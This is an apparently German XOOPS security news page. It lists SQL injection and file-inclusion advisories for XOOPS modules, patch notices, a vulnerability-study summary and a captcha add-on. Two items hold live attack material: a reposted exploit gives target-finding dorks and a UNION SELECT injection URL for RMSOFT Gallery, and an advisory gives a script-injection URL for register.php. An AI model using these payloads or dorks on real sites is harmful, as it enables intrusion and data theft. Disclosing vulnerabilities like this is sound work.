1 XOOPS Tiny Event ‘print’ Option SQL Injection Vulnerability (Vulnerabilities)

Last modified on: 2008-02-21 00:00:00 MST
URL: http://www.securityfocus.com/bid/27931

2 XOOPS ‘prayerlist’ Module ‘cid’ Parameter SQL Injection Vulnerability (Vulnerabilities)

Last modified on: 2008-02-21 00:00:00 MST
URL: http://www.securityfocus.com/bid/27934

3 XOOPS eEmpregos Module ‘index.php’ SQL Injection Vulnerability (Vulnerabilities)

Last modified on: 2008-02-20 00:00:00 MST
URL: http://www.securityfocus.com/bid/27905

4 XOOPS ‘classifieds’ Module ‘cid’ Parameter SQL Injection Vulnerability (Vulnerabilities)

Last modified on: 2008-02-19 00:00:00 MST
URL: http://www.securityfocus.com/bid/27895

5 XOOPS ‘vacatures’ Module ‘cid’ Parameter SQL Injection Vulnerability (Vulnerabilities)

Last modified on: 2008-02-19 00:00:00 MST
URL: http://www.securityfocus.com/bid/27889

6 XOOPS ‘badliege’ Module ‘id’ Parameter SQL Injection Vulnerability (Vulnerabilities)

Last modified on: 2008-02-19 00:00:00 MST
URL: http://www.securityfocus.com/bid/27892

7 XOOPS ‘events’ Module ‘id’ Parameter SQL Injection Vulnerability (Vulnerabilities)

Last modified on: 2008-02-19 00:00:00 MST
URL: http://www.securityfocus.com/bid/27890

8 XOOPS ’seminars’ Module ‘id’ Parameter SQL Injection Vulnerability (Vulnerabilities)

Last modified on: 2008-02-19 00:00:00 MST
URL: http://www.securityfocus.com/bid/27891

9 XOOPS myTopics Module ‘print.php’ SQL Injection Vulnerability (Vulnerabilities)

Last modified on: 2008-02-18 00:00:00 MST
URL: http://www.securityfocus.com/bid/27861

Details : ExploitAlert

Topic : RMSOFT Gallery System 2.0 (images.php id) SQL Injection Vulnerability   ExploitAlert : 3336   Credit : you_kn0w   Date : 5.2.2008   Download   Exploit Code : #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=# # ~Author: you_kn0w # # ~Contact: you-know[at]linuxmail.org # # ~Website: www.youknowz.info # # ~Script: RRMSOFT Gallery # # ~Bug: RRMSOFT Gallery Remote SQL Injection # #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=# # Script Information # #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=# # # # Script name: RRMSOFT Gallery System # # Script site: http://www.xoopsmexico.net # # Script get: www.xoopsmexico.net/modules/rmdp# # Description: PHP media gallery System # # Version: 2.0 # #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=# # [-]Dorks: intext:Powered by RMSOFT GS 2.0 inurl:modules/rmgs/images.php # [+]How To Exploit: http://[target].com/[path]/modules/rmgs/images.php?q=user&id =1999/**/union/**/all/**/select/**/1,1,concat(database(),0×202D20 ,user()),1,1,1,1,0,1,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/ * # [+]Greetz: Greetz to; ka0x - Celciuz - JosS - Phanter-Root & Screamo //you_kn0w #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#

Quelle:http://securityreason.com/exploitalert/3336

Es wurde eine Sicherheitslücke gefunden in dem XOOPS Modul: Flashgames

Aber der Entwickler hat sofort reagiert und diese Lücke geschlossen. Er empfiehlt jeden zum Update der Datei “game.php”. Das Update erhält jeder unter der Webseite tipsmitgrips.de. Die Vollversion des Modules beinhaltet auch den Patch, jedoch wurde die Versionsnummer nicht geändert. Das neue und alte Version bleibt bei “1.0.1″.

Es wurde eine Sicherheitslücke im Modul xoopsgallery gefunden.
XOOPS mod_gallery Zend_Hash_key + Extract REMOTE FILE INCLUDE.
Bug works only with register_globals = OFF.
Author: Eugene Minaev underwater@itdefence.ru.

http://www.milw0rm.com/exploits/4847

XOOPS 2.2.5

Risk Level:
MEDIUM - Vulnerability can be exploited to execute arbitrary HTML and script code in a user’s browser session in the context of an affected site.

Cross-site Scripting Vulnerability:
Input passed via the URL to “register.php” in the “/modules/profile” directory isn’t properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.

Sample Exploit Code:

http://host/xoops/modules/profile/register.php?>'"><script>alert('XSS');</script>

The DigiTrust Group

Eine Studie zeigt Hackers Lieblinge. Das diese Liste natürlich Microsoft anführt, dürfte keine Person überraschen. Immerhin wird das Betriebssystem sehr oft von Hacker angegriffen. Deshalb entfallen für die Firma Microsoft ganze 4,2 Prozent der Verwundbarkeit. Gefolgt in der Liste von Apple und Oracle. Aber auch XOOPS hat es leider in die Liste geschafft. Da das CMS immer populärer wird, wird es leider auch zunehmend interessant für die Hacker. Bei XOOPS sind es noch 1,2 Prozent!

Die Studie der ISS (Internet Security Systems) hat für das erste Halbjahr 3273 Verwundbarkeiten gezählt. Etwa die Hälfte der Löcher ermögliche zudem die Kontrolle über das angegriffene System!

Quelle: silicon.de

Nach dem erscheinen der neuen XOOPS Versionen wird es auch Zeit für das Captcha (Sicherheitsbild). Wir haben ein Hack zum Download bereitgestellt, indem das Captcha bei der Neuregistrierung angezeigt wird. (Voraussetzung ist, das sich das Framework in der XOOPS Root befindet.) Dieses Captcha gibt es jetzt kostenlos zum Download für alle Mitglieder. Es ist verfügbar für die aktuellen XOOPS Versionen 2.0.16 / 2.0.17 und auch für 2.2.5 (RC3 / final). (Funktioniert auch mit Framework 1.20) Eine Anleitung liegt bei jedem Download mit dabei!
Desweiteren bieten wir einen Captcha-Download an, für die XOOPS-Kommentare. Dieser Hack funktioniert unter XOOPS 2.0.16 und 2.0.17 gleichermaßen. Mit der Eingabe des Sicherheitscodes können jetzt auch die Gäste sehr einfach einen Kommentar im Portal schreiben.

Heute sind zwei wichtige Sicherheitsupdates erschienen. Einmal für das beliebte Modul “debaser” und für das (in Europa etwas unbekannte) Modul “PopnupBlog”. Wer eines dieser Module nutzt, sollte dringend dieses Update durchführen. Ein Patch für das Modul “debaser” steht hier zur Verfügung. Und die neue Version 3.13 von “PopnupBlog” kann hier geladen werden. Vielen Dank an die Entwickler!

Es geht Vorwärts - Die kommende Version 2.0.17 nimmt langsam Gestalt an und es wurden gegenüber den Vorgängerversionen viel mehr Änderungen Durchgeführt. Die vielen Fehlerbehebungen sprechen für sich. Auf die Final-Version können wir gespannt sein, lange kann es nicht mehr dauern. Jeder kann die aktuelle Changelog nachlesen über die Sourceforge Webseite. Den Link habe ich Euch herausgesucht, das Changelog findet Ihr HIER.

Xoops Horoscope Modul “xoopsConfig[root_path]” Einbindung von Dateien

Secunia Advisory: SA25651
Herausgegeben: 2007-06-13

Gefahrenstufe: Sehr kritisch
Auswirkung: Enthüllung von Systeminformationen, Enthüllung von sensiblen Informationen, Systemzugriff
Von Wo: Aus dem Internet
Lösungsstatus: Nicht gepatcht
Software: Horoscope 2.x (module for Xoops)

Beschreibung: BeyazKurt hat eine Sicherheitslücke in dem Horoscope Modul für Xoops entdeckt, die böswillige Personen ausnutzen können, um sensible Informationen zu enthüllen oder ein verwundbares System zu kompromittieren. Eingaben an den Parameter “xoopsConfig[root_path]” in der Datei footer.php werden nicht korrekt überprüft, bevor sie zum Einbinden von Dateien verwendet werden. Dies kann ausgenutzt werden, um beliebige Dateien aus lokalen oder externen Ressourcen einzubinden. Eine erfolgreiche Ausnutzung setzt voraus, dass “register_globals” aktiviert ist. Die Sicherheitslücke ist in Version 2.0 bestätigt. Andere Versionen können ebenfalls betroffen sein.

Lösung: Editieren Sie den Quelltext, um sicherzustellen, dass Eingaben korrekt überprüft werden.

Gemeldet und/oder entdeckt von:
BeyazKurt

Original Advisory:
http://milw0rm.com/exploits/4064